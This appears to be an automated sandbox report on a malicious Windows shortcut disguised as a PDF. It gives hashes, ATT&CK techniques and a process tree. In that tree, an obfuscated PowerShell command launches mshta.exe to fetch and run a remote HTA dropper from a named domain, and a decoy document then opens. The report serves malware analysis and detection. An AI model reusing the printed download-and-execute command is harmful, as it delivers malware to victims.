e0789527ab4f8ec59edb538dcac4f80a457964a40a2b213fe71a8be49f565e66

Analysis

max time kernel
148s
max time network
147s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
02/08/2024, 16:14

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Contract And Bm link.pdf.lnk
Size

2KB
MD5

5c101777fec7ff1e36a330c5f739901b
SHA1

231ed0c3c869071786e5592422e36f079889c9d1
SHA256

0cee6c7fbe37cb12a8c4416bc916aed3644ad5c09f02641477522a940bfb8d9e
SHA512

b7482f65d7f859c782056caed992f8cadc01be45529ea2e8031e07e3c885f73911262fde1bec8a42cb41c36db5d8b378478133ffa8592661daa73f1e8bc8a70d

Score

10^/10

discovery

Malware Config

Extracted

Language

hta

Source

URLs

hta.dropper

https://www.newupdatenew.com/LOCKSA/PDFGOOOOO.HTA

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
2	712	mshta.exe
5	712	mshta.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\International\Geo\Nation	cmd.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe

Suspicious behavior: EnumeratesProcesses 12 IoCs

pid	Process
4160	powershell.exe
4160	powershell.exe
2384	msedge.exe
2384	msedge.exe
4872	msedge.exe
4872	msedge.exe
2068	identity_helper.exe
2068	identity_helper.exe
4136	msedge.exe
4136	msedge.exe
4136	msedge.exe
4136	msedge.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs

pid	Process
4872	msedge.exe
4872	msedge.exe
4872	msedge.exe
4872	msedge.exe
4872	msedge.exe
4872	msedge.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	4160	powershell.exe

Suspicious use of FindShellTrayWindow 25 IoCs

pid	Process
4872	msedge.exe
4872	msedge.exe
4872	msedge.exe
4872	msedge.exe
4872	msedge.exe
4872	msedge.exe
4872	msedge.exe
4872	msedge.exe
4872	msedge.exe
4872	msedge.exe
4872	msedge.exe
4872	msedge.exe
4872	msedge.exe
4872	msedge.exe
4872	msedge.exe
4872	msedge.exe
4872	msedge.exe
4872	msedge.exe
4872	msedge.exe
4872	msedge.exe
4872	msedge.exe
4872	msedge.exe
4872	msedge.exe
4872	msedge.exe
4872	msedge.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
4872	msedge.exe
4872	msedge.exe
4872	msedge.exe
4872	msedge.exe
4872	msedge.exe
4872	msedge.exe
4872	msedge.exe
4872	msedge.exe
4872	msedge.exe
4872	msedge.exe
4872	msedge.exe
4872	msedge.exe
4872	msedge.exe
4872	msedge.exe
4872	msedge.exe
4872	msedge.exe
4872	msedge.exe
4872	msedge.exe
4872	msedge.exe
4872	msedge.exe
4872	msedge.exe
4872	msedge.exe
4872	msedge.exe
4872	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1512 wrote to memory of 4160	1512	cmd.exe	83
PID 1512 wrote to memory of 4160	1512	cmd.exe	83
PID 4160 wrote to memory of 712	4160	powershell.exe	86
PID 4160 wrote to memory of 712	4160	powershell.exe	86
PID 712 wrote to memory of 2524	712	mshta.exe	87
PID 712 wrote to memory of 2524	712	mshta.exe	87
PID 2524 wrote to memory of 4872	2524	cmd.exe	89
PID 2524 wrote to memory of 4872	2524	cmd.exe	89
PID 4872 wrote to memory of 1360	4872	msedge.exe	91
PID 4872 wrote to memory of 1360	4872	msedge.exe	91
PID 4872 wrote to memory of 1044	4872	msedge.exe	92
PID 4872 wrote to memory of 1044	4872	msedge.exe	92
PID 4872 wrote to memory of 1044	4872	msedge.exe	92
PID 4872 wrote to memory of 1044	4872	msedge.exe	92
PID 4872 wrote to memory of 1044	4872	msedge.exe	92
PID 4872 wrote to memory of 1044	4872	msedge.exe	92
PID 4872 wrote to memory of 1044	4872	msedge.exe	92
PID 4872 wrote to memory of 1044	4872	msedge.exe	92
PID 4872 wrote to memory of 1044	4872	msedge.exe	92
PID 4872 wrote to memory of 1044	4872	msedge.exe	92
PID 4872 wrote to memory of 1044	4872	msedge.exe	92
PID 4872 wrote to memory of 1044	4872	msedge.exe	92
PID 4872 wrote to memory of 1044	4872	msedge.exe	92
PID 4872 wrote to memory of 1044	4872	msedge.exe	92
PID 4872 wrote to memory of 1044	4872	msedge.exe	92
PID 4872 wrote to memory of 1044	4872	msedge.exe	92
PID 4872 wrote to memory of 1044	4872	msedge.exe	92
PID 4872 wrote to memory of 1044	4872	msedge.exe	92
PID 4872 wrote to memory of 1044	4872	msedge.exe	92
PID 4872 wrote to memory of 1044	4872	msedge.exe	92
PID 4872 wrote to memory of 1044	4872	msedge.exe	92
PID 4872 wrote to memory of 1044	4872	msedge.exe	92
PID 4872 wrote to memory of 1044	4872	msedge.exe	92
PID 4872 wrote to memory of 1044	4872	msedge.exe	92
PID 4872 wrote to memory of 1044	4872	msedge.exe	92
PID 4872 wrote to memory of 1044	4872	msedge.exe	92
PID 4872 wrote to memory of 1044	4872	msedge.exe	92
PID 4872 wrote to memory of 1044	4872	msedge.exe	92
PID 4872 wrote to memory of 1044	4872	msedge.exe	92
PID 4872 wrote to memory of 1044	4872	msedge.exe	92
PID 4872 wrote to memory of 1044	4872	msedge.exe	92
PID 4872 wrote to memory of 1044	4872	msedge.exe	92
PID 4872 wrote to memory of 1044	4872	msedge.exe	92
PID 4872 wrote to memory of 1044	4872	msedge.exe	92
PID 4872 wrote to memory of 1044	4872	msedge.exe	92
PID 4872 wrote to memory of 1044	4872	msedge.exe	92
PID 4872 wrote to memory of 1044	4872	msedge.exe	92
PID 4872 wrote to memory of 1044	4872	msedge.exe	92
PID 4872 wrote to memory of 1044	4872	msedge.exe	92
PID 4872 wrote to memory of 1044	4872	msedge.exe	92
PID 4872 wrote to memory of 2384	4872	msedge.exe	93
PID 4872 wrote to memory of 2384	4872	msedge.exe	93
PID 4872 wrote to memory of 3476	4872	msedge.exe	94
PID 4872 wrote to memory of 3476	4872	msedge.exe	94
PID 4872 wrote to memory of 3476	4872	msedge.exe	94
PID 4872 wrote to memory of 3476	4872	msedge.exe	94
PID 4872 wrote to memory of 3476	4872	msedge.exe	94
PID 4872 wrote to memory of 3476	4872	msedge.exe	94
PID 4872 wrote to memory of 3476	4872	msedge.exe	94
PID 4872 wrote to memory of 3476	4872	msedge.exe	94
PID 4872 wrote to memory of 3476	4872	msedge.exe	94
PID 4872 wrote to memory of 3476	4872	msedge.exe	94
PID 4872 wrote to memory of 3476	4872	msedge.exe	94
PID 4872 wrote to memory of 3476	4872	msedge.exe	94

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\Contract And Bm link.pdf.lnk"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1512
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" . $env:C:\W*\S*2\m*h?a.* ' https://www.newupdatenew.com/LOCKSA/PDFGOOOOO.HTA '
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4160
- - C:\Windows\System32\mshta.exe
    "C:\Windows\System32\mshta.exe" " https://www.newupdatenew.com/LOCKSA/PDFGOOOOO.HTA "
    3⤵
    - Blocklisted process makes network request
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    PID:712
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c start "" "https://docs.google.com/document/d/1F5RULhkoBF-7vdHlyYfHj3e_zEDMCP6lEzhIzBxJ77M/edit"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2524
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://docs.google.com/document/d/1F5RULhkoBF-7vdHlyYfHj3e_zEDMCP6lEzhIzBxJ77M/edit
        5⤵
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        Suspicious use of WriteProcessMemory
        
        PID:4872
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff92ff946f8,0x7ff92ff94708,0x7ff92ff94718
        6⤵
        
        PID:1360
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2064,16597875943851901618,12626991780256921352,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2096 /prefetch:2
        6⤵
        
        PID:1044
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2064,16597875943851901618,12626991780256921352,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2160 /prefetch:3
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2384
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2064,16597875943851901618,12626991780256921352,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2832 /prefetch:8
        6⤵
        
        PID:3476
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,16597875943851901618,12626991780256921352,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3352 /prefetch:1
        6⤵
        
        PID:1856
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,16597875943851901618,12626991780256921352,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3380 /prefetch:1
        6⤵
        
        PID:1732
      - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2064,16597875943851901618,12626991780256921352,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5448 /prefetch:8
        6⤵
        
        PID:1464
      - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2064,16597875943851901618,12626991780256921352,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5448 /prefetch:8
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2068
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,16597875943851901618,12626991780256921352,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5164 /prefetch:1
        6⤵
        
        PID:1960
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,16597875943851901618,12626991780256921352,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5124 /prefetch:1
        6⤵
        
        PID:4568
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,16597875943851901618,12626991780256921352,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5580 /prefetch:1
        6⤵
        
        PID:216
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,16597875943851901618,12626991780256921352,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5672 /prefetch:1
        6⤵
        
        PID:3528
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2064,16597875943851901618,12626991780256921352,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1552 /prefetch:2
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4136

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1496

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4804

C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\e429df47e6ec49d783de64fe11a3b1c0 /t 1268 /p 712
1⤵
PID:4008

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
27304926d60324abe74d7a4b571c35ea

SHA1
78b8f92fcaf4a09eaa786bbe33fd1b0222ef29c1

SHA256
7039ad5c2b40f4d97c8c2269f4942be13436d739b2e1f8feb7a0c9f9fdb931de

SHA512
f5b6181d3f432238c7365f64fc8a373299e23ba8178bcc419471916ef8b23e909787c7c0617ab22e4eb90909c02bd7b84f1386fbc61e2bdb5a0eb474175da4bd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
672B

MD5
034ed8f667d1b7cf6228139bbad79454

SHA1
0d643a4e39873e1648c2efe9b63fc69148a04f50

SHA256
a50484659dfc0210b586b5135a757019f17c423f8c9b6d0a8a8f3c8ed815a9f5

SHA512
e9691cf1a25ae3611f4f9213422d08bb24679b053bb5183b133d5aef3a3f9a8dc7f0d6c425a329db66bf5f01d57f16f59aaf701eba85d5b1802ce763b9fca2a1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
3KB

MD5
9edf101babb66de6c4d4f3a7cbd10439

SHA1
b9d8993700b02999f92499cc57d9458e8b897cf1

SHA256
205c275895e960a13ee4f1699762ea2385e1b9e7fbadd1fdcb2da59633c0a5a1

SHA512
d9f73b6ae3b0fef6e7db6d9c13540f0909e8142ee3b36476675d6a21f8364c6be13a186e502995c2777c89c04c9b468596108e542aafb77e22ead2683fe051f7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
3KB

MD5
fb231dcf0f8feb78a3593af1ec1b7f8f

SHA1
29687579bc80aa6c579f6ad15ccae1e0f2b73b0e

SHA256
00009d56f95eef34f29aab57e87cbc2c6bd601bfd95c958279a0238e89e51369

SHA512
4152f52455a2c2adaf1636d60f5ab9e288b9278cd9d323e8937c4940eaf6f2b549ebe8fda08638232e4ec847e05f7c1fb0978270caab2e05874bc4e94cda2da3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
444d8e86f7990bccf87989c19d30ed2d

SHA1
9a53b01dca9773049f7c18340076c3cce4f32bc0

SHA256
171c5fdf47f429928b82bcfa9fde3bea698061a39995fe2967f0c749b58e8ff6

SHA512
1bdc8b4a167f454f876a5c7a3537e9b3bd0c269aee42f67a72dac9f6eb056c635a9cc7d0291d9ea4c16db89a2a07a1afe80a55b9ae58c02d9c5d3a689a9e8bbe

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
22dd3d6a5bca8741deff18f44d51f46c

SHA1
b49a8bc90802ecbb22a17746ed6df5806364d673

SHA256
ae5a126814a21d43ad0773610dde3e85adaf25a4701646222ca5d03975e67142

SHA512
1d3c5d6268646448e83582875cd136590dee2aa49a8b4574655a71b779a1c057f894377f2707ae843c63f7df94533f5aabe5683cbf8cfa67408fdae57351783f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
97a4f1e65c44cd663536d38989b0ade7

SHA1
9fff668b56807214d8cdad795a4e3700b6f140d9

SHA256
a66a54c2557ba7b9ce61bcb028a6056ae3990bd0234cbb94faefc66eb988fd34

SHA512
570b7887039932f31e9307deee73303dcc937e735879cff15348bd3da2101c2cad22946ad803e1b6e746d9626272e929f1b11d598a952cea34477784095e6e02

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jamm3qki.s3u.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/4160-16-0x00007FF920340000-0x00007FF920E01000-memory.dmp

Filesize
10.8MB

Download
memory/4160-2-0x00007FF920343000-0x00007FF920345000-memory.dmp

Filesize
8KB

Download
memory/4160-14-0x00007FF920340000-0x00007FF920E01000-memory.dmp

Filesize
10.8MB

Download
memory/4160-13-0x00007FF920340000-0x00007FF920E01000-memory.dmp

Filesize
10.8MB

Download
memory/4160-12-0x000001A039150000-0x000001A039172000-memory.dmp

Filesize
136KB

Download